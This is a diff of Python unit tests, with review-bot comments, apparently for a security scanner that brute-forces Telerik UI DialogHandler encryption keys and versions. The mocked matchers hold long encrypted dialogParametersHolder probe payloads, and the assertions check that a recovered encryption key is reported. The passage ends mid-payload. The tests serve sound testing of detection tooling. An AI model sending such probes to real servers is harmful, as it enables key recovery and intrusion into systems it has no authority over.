@@ -120,9 +120,8 @@ def PBKDF2_found_key_matcher_negative(request): def PBKDF2_version_probe_matcher(request): if ( - request.body != "dialogParametersHolder=AAAA" - and request.body - == "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT
4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhLj8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv1VXPXnur4dJnoCkwBP2%2BQQ6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvay5xE4PoiuJ4tF82nhc3kr%2FsJWj86DXt9uK%2FPIDMokhA1wZ2BS8rN8V8J43gXMVkQtHFyqiAMoKttVwox3GtbTdmzYcjtjdZmL3VB27giGRreZsDbr6lsLJKVYnGtzAwL1nb45fLFtBNpiGXKHwE0soY3dapt%2FwadcvpFryVyG%2BesgLUwLWjgGepMMbQgPgi7Lk9TDgl5pO9Sg2%2B%2BCDEKkhmknkE%2FW4zr%2FbE3Qg97NK3hkIC0ajQvysQCsD2G98NREwRp5Yo2qUVqoKsz%2BM5FifnHVivHtbpB%2B0jSdbMPBVqrn6aJutLfJazoTo1MP5RGYQXwBR%2BiE%2BzrvvH3cYwPt7ac%2FkG%2BPEEDYQKPU%2F945Sh5D2ST2TwV1nVjoVq0xMgmM4rJmTTKSABcevdVyK41RiiOgJ1hXMLvtClnaA0rmU1zdilFkAHpka5VW9IKQa4edHYgnnLRdQfQ6YljskVGbbHuSZX9a5AiW9eHYyoNYZno%3D" + request.body + == 
"dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhLj8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv
1VXPXnur4dJnoCkwBP2%2BQQ6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvayztxVhLnSpRwg5uIXktoMwJ%2FSaF8x29hA9LIyUqAu4%2FR2hQW%2B4SImPpsXXpqtiGkjfub23eHBh6%2BtPfI7KNBt0Sz%2F3IcUvQk%2BWZYFfPMd8cXJdempaxEs%2BWRlN16p%2BjqhLiVh2A8iaZ4WvdHZmEP7slp3BgAJHjnl7C9sEWeDqCEwe%2FjIDLeJ1X%2FDjBXwflC7CNUtfL5Xw3En%2FArqlvVhUGhwvFy6lQocBfs6%2BLYvOaWiwZ37DX8rkRZlWpkY2rpapUrmnba7Ly%2FoLx924DzkK78M%2BzFL0ra5b1t6Rgv5zuibZAhF47t1EdOxpWIlBlf3zB9gg2M5Rk%2F9IMH%2BzrDHou9o9uO%2BDC6WFddIOuEWc1nrjSenwFkvqgNVdc9CtdiVDWnFLKJh70er5L8AlH7uCb4iXrYljyCSAeyr0DiKz6T8ox10NRGPI6iJbYf%2FIr3IuZE1oJgqcvn7tKhQBOq4jemlZpbeQgPy0FxO0%2BDxeqI%3D" ): return True return False 
@@ -132,9 +131,9 @@ def PBKDF2_version_probe_matcher_incorrect(request): if ( request.body != "dialogParametersHolder=AAAA" and request.body - != "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhL
j8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv1VXPXnur4dJnoCkwBP2%2BQQ6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvay5xE4PoiuJ4tF82nhc3kr%2FsJWj86DXt9uK%2FPIDMokhA1wZ2BS8rN8V8J43gXMVkQtHFyqiAMoKttVwox3GtbTdmzYcjtjdZmL3VB27giGRreZsDbr6lsLJKVYnGtzAwL1nb45fLFtBNpiGXKHwE0soY3dapt%2FwadcvpFryVyG%2BesgLUwLWjgGepMMbQgPgi7Lk9TDgl5pO9Sg2%2B%2BCDEKkhmknkE%2FW4zr%2FbE3Qg97NK3hkIC0ajQvysQCsD2G98NREwRp5Yo2qUVqoKsz%2BM5FifnHVivHtbpB%2B0jSdbMPBVqrn6aJutLfJazoTo1MP5RGYQXwBR%2BiE%2BzrvvH3cYwPt7ac%2FkG%2BPEEDYQKPU%2F945Sh5D2ST2TwV1nVjoVq0xMgmM4rJmTTKSABcevdVyK41RiiOgJ1hXMLvtClnaA0rmU1zdilFkAHpka5VW9IKQa4edHYgnnLRdQfQ6YljskVGbbHuSZX9a5AiW9eHYyoNYZno%3D" + != 
"dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhLj8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv
1VXPXnur4dJnoCkwBP2%2BQQ6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvayztxVhLnSpRwg5uIXktoMwJ%2FSaF8x29hA9LIyUqAu4%2FR2hQW%2B4SImPpsXXpqtiGkjfub23eHBh6%2BtPfI7KNBt0Sz%2F3IcUvQk%2BWZYFfPMd8cXJdempaxEs%2BWRlN16p%2BjqhLiVh2A8iaZ4WvdHZmEP7slp3BgAJHjnl7C9sEWeDqCEwe%2FjIDLeJ1X%2FDjBXwflC7CNUtfL5Xw3En%2FArqlvVhUGhwvFy6lQocBfs6%2BLYvOaWiwZ37DX8rkRZlWpkY2rpapUrmnba7Ly%2FoLx924DzkK78M%2BzFL0ra5b1t6Rgv5zuibZAhF47t1EdOxpWIlBlf3zB9gg2M5Rk%2F9IMH%2BzrDHou9o9uO%2BDC6WFddIOuEWc1nrjSenwFkvqgNVdc9CtdiVDWnFLKJh70er5L8AlH7uCb4iXrYljyCSAeyr0DiKz6T8ox10NRGPI6iJbYf%2FIr3IuZE1oJgqcvn7tKhQBOq4jemlZpbeQgPy0FxO0%2BDxeqI%3D" and request.body - != "dialogParametersHolder=Ct3E%2FAXZ0ct05hNqzzSbCRVxte%2F%2BQBIVbVz21p21CqLSnQsGfzTjsiq%2FxoAQaaDuaafBKu8cNXMOGT5kJcE0snNDBVbQqvbQLEYa1cWQYr%2FL2tOMq8Rnuzq6F7HKpN2%2BP0tdCPxrO3s6K2W43kvEO5wyaDlijlF9r2XI6UL1FUk%3D" + != "dialogParametersHolder=%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rFGZylxNlfmCxZEQFLAyV2xh%2FkGVb%2Bk95TQYnppybCMfuwinH7NDbVXKO7qr3kTNUCkgUUdFGWw6%2BoM49hkD%2BwQN%2F62S%2F%2BfVkxGJeRQEKHakLELFYpjwgW6UsXXDGmQilTdKx4iZ1MlO3JsD%2FWMUF94bACEiq26YUKhW7j0MEChv4regUuWBhAvrq0WKEdRbk%3D" ): return True return False 
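Review bot: The multi-kilobyte `dialogParametersHolder=...` payload compared in PBKDF2_version_probe_matcher_incorrect is an opaque inline literal, and what appears to be the same value is asserted against `captured.out` in the hunk at -301. Binding it once to a module-level constant (for example `PBKDF2_EXPECTED_PAYLOAD`, a name made up here) would make the next fixture change a one-place edit. A short comment saying which key and version the payload was generated with would also show that the matcher and the assertion refer to the same request. The function's `def` line is above the hunk.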
@@ -290,7 +289,8 @@ def generate_keylist_hash(include_machinekeys): m.post( f"http://PBKDF2.telerik.com/Telerik.Web.UI.DialogHandler.aspx", additional_matcher=PBKDF2_version_probe_matcher_incorrect, - status_code=500, + status_code=200, + text="Could not load file or assembly 'Telerik.Web.UI, Version=1984.5.622, Culture=neutral, PublicKeyToken=121fae78165ba3d4' or one of its dependencies. The located assembly's manifest definition does not match the assembly reference. (Exception from HRESULT: 0x80131040)", ) monkeypatch.setattr( 
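Review bot: The version-probe mock now answers 200 with a full assembly-load error, but nothing records why the test depends on that text, and the same long literal is pasted again in the hunks at -345 and -416. A module-level constant used as `text=ASSEMBLY_MISMATCH_TEXT,` (name made up here) would keep the three mocks in sync. A one-line comment such as `# response returned when the guessed version does not match the installed assembly` would record the intent, assuming that is what this mock stands for. The surrounding test function starts and ends outside the hunk.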
@@ -301,13 +301,13 @@ def generate_keylist_hash(include_machinekeys): captured = capsys.readouterr() print(captured.out) assert "Target is a newer version of Telerik UI" in captured.out - assert "Found Encryption key!" in captured.out - assert "Found matching hashkey!" in captured.out + assert "Found encryption key: [d2a312d9-7af4-43de-be5a-ae717b46cea6]" in captured.out + assert "SUCCESS! Found encryption key: [d2a312d9-7af4-43de-be5a-ae717b46cea6]" in captured.out + assert ("SUCCESS! Found working version: 2018.1.117") in captured.out assert ( - "%2Bv%2BRs6kf9lDUYnqqYk32Vg84DkpdruQOKGZRmm6RMkaYuxNmvg5Ca5cT%2F74qkOozHIKkG1ovf6XBsjlp4kgO8BJ6KgNcT78BExQZfT1mN5rMO8kcLDRdffFhFXmvAr0o%2F4x%2B9VoRJVaOyGLXk2nhX4OMP%2BjGP2C96Fa6LyfGWHlk1CF0E5mAPeQ6CLbycR88WU5hlmUUqniXC2UdeYd6HO9RFnISEnhq72MkdiEfvNsqAhr2XaCX2%2BQxFXfCLi2%2Fc%2Bn2NmUiFRdhCLutnVxILEnYiRmU5eHJdB2IOTtoc2XZ3NUdZJwrwOswjzCkk7LOwt2bddTvOXdfWtRrbNz1GDNXlPz1cXotgAhucxLLsknNDbeeboMbL%2Bk3tIeervi7oI%2FRQn6Ml3ffUAfcqHzwcZCEIlQXh%2FBEIKHAY9fGKs5JSdtRbREDI0rh9sH%2B0TmYv444WQyqYpa8pOqtxgC1QRRcsNQcVGFzpyNL2SfKSlLTZi5Q7bo8XMTfLG6jg60csDEDiJ7MwJBGIm1iYzt%2FP9JEKkZujTMyHoBI0RESNpux7BeanEIDsfDmfwbcUo%2B2%2BkoHkCE4zXWBdW3lqssk4GwSbc0mbmf3U79rsQdNEqIOL87evE1U6tGB5PuXgwAIj9sKdyffd8%2B%2Bz1CCffFovLM72ilbCmSljAJ%2BvVBfNpTiL7RV7j3XGygljzi4NL8yXJuCLYiNxmqPMdV8DahLed0jSe2mkU1u6rx4yS3dcWEfwMWjI5tVrfnbqtdInC8TliXkTZ919CtORoydmIXGL1u3kdBIq8EZcjRMa4bN4VTvUlbqeIe8p8QYEQwAi7vXiZCKS6R6dmJfQv%2B%2FqBHXWSFuglLYde019GNtNdGQfEnY31zT0Q86ieDYn4k55LbYq5lK8PNjg50gdJxn9fNtHTQ7frKP9vRM4cImRSvDBTATVw1PDzMqn0exo3xciYd5%2BXYAxlFoqwFMDz40w2xR4OWwoPsixpVjR2DYiqYiZrYytFMjziRCLQhkVuJpED8nB9CTlo05WBKN%2Bb4UBHBg%2FkCkHXJxNakIX7UbAjDcqzrNCGhjrgehCGA81uOf0Ppfswda0ZHMi8g9W6Y7uwWmn7Ux7xBMgDCUNIi8I3UvLGXdKnuB8YHX8TLC1z2%2Fm3ip797Pix1ya2sBsbw9KgOJ7PBT0u9W0puchi7zpT%2FzFe3V2HbV0ottDethRJhzaN856VgvjyNhbbmA04gnal%2Fq01j7LNWxEwTjNPyHORI1l9jztvYqItLei7YQYg2pFhmvuv0Od8DPfH40Y1m3mL2F2d%2FAy3ImzFI%2BKQB6mnGPvRcDIS1j7zPhciKRuLfu3dCxhIH7ojo83rhQus3SyXdyZ5cjkFKcG3H7WmBBMOFs2o5
xjWcdLARevRbNbqwRfATerc5GuJxy1Qb8RJvOqhDcS5YAHyxVMx2QYU3yMhg0tCpy4wW%2FHsa33feu3NeBu9lRI38ojJNM7o6xYRoSTQu4tYadB4Yh4w60e%2FsttnecOC5plZrLw6BYN2piqvUD07BnO4yTvrpdBDXR%2BMFDchnFh2YK9JtvvtAISvpoSOJojOhwRKuafCwEJn0GB1dsdmOOxxaFHkPXQ7789eCxlTL5mkVf3ktzmHQdDyBxBlDLFWSjmFIBHp%2BPobFdDOmv5p6J3%2F%2FM23PMgGDLRMrj5LVZV3trGV1ZaJHEFIGmVwW0tN4426Q4rCdcxT4ju%2B%2FNhcq90e8crWw9nrF2rPTzW1YM7VqWWwhLj8MtVtGZFa3N%2FxdjEys8FWyT8VqAbC4IltuT5lW1ou1SXsA96h%2F9y3vzJADbm4Lv624OGnh6M%2FCmR930i6YeUlWWmMw1%2FpcZ5werHPm9v0OWulNmGfbNEoKuThz2sSCZ8FLNVToygv1VXPXnur4dJnoCkwBP2%2BQQ6%2FHlyFRXnrrGsiDJE3qtRXgECIhc2zpuC5HAz9FhIfC9VZZ5nxRMbhA6W%2Fz%2BjPpKLCBpmLqHJfy8%2B%2FausiZJv7d9yQ0SvHtq0y%2FSY04hOgZTJul6IIYpObD6s%2FqrGy2nMmY3%2FtEn830%2F%2BFERnXMeBsj%2B%2F5ZSewYe4xBnub1wvSbsA3qjoU5gq7fhDJOhmMQXkbas%2FRholsU9CNKNXpSyqVarqAc8XwaG34JmdG3wjQXd6p%2Bz2jZLew5ja8nelvVdIeN%2F9ejCNOoXcPApYLHyxslcrEuJrSHlAMR4FbonfrFhYYTR%2B8pdxRGYGpVUDxlIRvay5xE4PoiuJ4tF82nhc3kr%2FsJWj86DXt9uK%2FPIDMokhA1wZ2BS8rN8V8J43gXMVkQtHFyqiAMoKttVwox3GtbTdmzYcjtjdZmL3VB27giGRreZsDbr6lsLJKVYnGtzAwL1nb45fLFtBNpiGXKHwE0soY3dapt%2Fwadcv